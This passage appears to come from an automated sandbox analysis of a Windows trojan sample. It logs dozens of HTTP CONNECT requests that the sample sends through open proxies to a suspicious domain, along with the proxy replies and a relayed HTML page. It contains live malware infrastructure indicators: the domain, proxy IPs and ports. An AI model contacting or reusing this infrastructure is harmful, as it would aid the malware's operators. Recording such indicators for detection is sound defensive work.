                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 50 20 43 6f 6d 70 75 74 69 6e 67 20 43 6f 6e 63 65 70 74 73 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 6c 69 62 2f 64 70 63 63 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 55 62 75 6e 74 75 3a 34 30 30 2c 33 30 30 2c 37 30 30 2c 35 30 30 2c 34 30 30 69 74 61 6c 69 63 25 37 63 44 69 64 61 63 74 2b 47 6f 74 68 69 63 3a 73 75 62 73 65 74 3d 6c 61 74 69 6e 2d 65 78 74 25 37 63 4d 75 6c 69 3a 34 30 30 2c 34 30 30 69 74 61 6c 69 63 2c 33 30 30 69 74 61 6c 69 63 2c 33 30 30 25 37 63 41 6d 69 6b 6f 3a 34 30 30 2c 37 30 30 22 0d 0a 20 20 20 20 20 20 20 20 20 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0d 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 42 6d 45 34 6b 57 42 71 37 38 69 59 68 46 6c 64 76 4b 75 68 66 54 41 55 36 61 75 55 38 74 54 39 34 57 72 48 66 74 6a 44 62 72 43 45 58 53 55 31 6f 42 6f 71 79 6c 32 51 76 5a 36 6a 49 57 33 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 40 35 2e 31 2e 33 2f 64 69 73 74 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 62 75 6e 64 6c 65 2e 6d 69 6e 2e 6a 73 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 6b 61 37 53 6b 30 47 6c 6e 34 67 6d 74 7a 32 4d 6c 51 6e 69 6b 54 31 77 58 67 59 73 4f 67 2b 4f 4d 68 75 50 2b 49 6c 52 48
                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"/> <meta name="MobileOptimized" content="width"/> <meta name="HandheldFriendly" content="true"/> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <link rel="shortcut icon" href="/favicon.ico" type="image/vnd.microsoft.icon"/> <title>DP Computing Concepts</title> <link rel="stylesheet" href="/lib/dpcc.css"> <link href="https://fonts.googleapis.com/css?family=Ubuntu:400,300,700,500,400italic%7cDidact+Gothic:subset=latin-ext%7cMuli:400,400italic,300italic,300%7cAmiko:400,700" media="all" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous"></head><body> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH
                                                                                Feb 23, 2024 14:28:25.325681925 CET1286INData Raw: 39 73 45 4e 42 4f 30 4c 52 6e 35 71 2b 38 6e 62 54 6f 76 34 2b 31 70 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69
                                                                                Data Ascii: 9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><header> <div class="row mt-2"> <div class="col-sm-auto">
                                                                                Feb 23, 2024 14:28:25.327146053 CET894INData Raw: 74 65 6d 73 2e 20 57 65 20 68 61 76 65 20 64 65 76 65 6c 6f 70 65 64 20 73 65 6e 73 6f 72 20 73 79 73 74 65 6d 73 20 66 6f 72 20 6d 6f 6e 69 74 6f 72 69 6e 67 20 62 61 73 69 63 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 61 6c 20 63 6f 6e 64 69 74 69 6f
                                                                                Data Ascii: tems. We have developed sensor systems for monitoring basic environmental conditions for growing agricultural products such as grapes. These sensors are capable of remotely monitoring temperature, humidity, light levels, and soil moistur


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                483192.168.2.851632145.239.2.102421475828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.193299055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.632329941 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.195175886 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.288661957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.382729053 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.382725000 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.492074966 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                484192.168.2.85157143.131.245.216156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.193814039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                485192.168.2.85165872.195.34.5841455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.223860979 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                486192.168.2.851120173.249.33.122493825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.230071068 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.288691998 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.381695032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.382719994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:49.398056984 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                487192.168.2.849806217.182.153.29120005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.255013943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.087182999 CET131INHTTP/1.1 503 Too many open connections
                                                                                Content-Type: text/plain
                                                                                Connection: close
                                                                                Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                Data Ascii: Maximum number of open connections reached.


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                488192.168.2.85165479.110.201.23580815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.261646986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                489192.168.2.851676104.20.51.99805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.265604973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.352869034 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                490192.168.2.851588116.199.170.1741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.306901932 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                491192.168.2.851586115.74.158.4010805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.310909986 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                492192.168.2.849790120.28.139.14380825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.320827961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.774173021 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                493192.168.2.85167723.92.223.12231285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.324443102 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                494192.168.2.851576118.91.175.14656785828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.324445009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                495192.168.2.851606182.253.93.4532815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.333980083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.194861889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.894171953 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                496192.168.2.8516458.213.128.688895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.335362911 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                497192.168.2.851505115.239.234.4373025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.341228008 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:25.711656094 CET90INHTTP/1.1 200 OK
                                                                                Content-Type: application/json
                                                                                Connection: close
                                                                                Content-Length: 55


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                498192.168.2.851710104.16.224.33805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.342046976 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.430790901 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                499192.168.2.851219132.148.6.238589775828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.347587109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.397907972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                500192.168.2.851603114.236.93.203155995828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.347592115 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                501192.168.2.849934107.180.101.226515265828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.360188961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.382441044 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.382785082 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                502192.168.2.851643171.236.241.24940065828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.367146969 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.737785101 CET39INHTTP/1.0 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                503192.168.2.851667211.222.252.187805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.367340088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                504192.168.2.85121572.210.221.19741455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.367355108 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                505192.168.2.851608103.127.1.130805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.379759073 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                506192.168.2.851697199.188.93.21490005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.395881891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                507192.168.2.851705200.79.141.86805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.405474901 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.573816061 CET340INHTTP/1.1 400 Bad Request
                                                                                Server: nginx/1.12.2
                                                                                Date: Fri, 23 Feb 2024 13:28:25 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Content-Length: 173
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                508192.168.2.851787211.234.125.34435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.410190105 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                509192.168.2.85168331.223.22.2110805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.419591904 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                510192.168.2.851659183.89.40.23210805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.419687033 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                511192.168.2.851791211.234.125.34435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.422754049 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                512192.168.2.851793211.234.125.34435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:25.423784018 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                513192.168.2.851796211.234.125.34435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
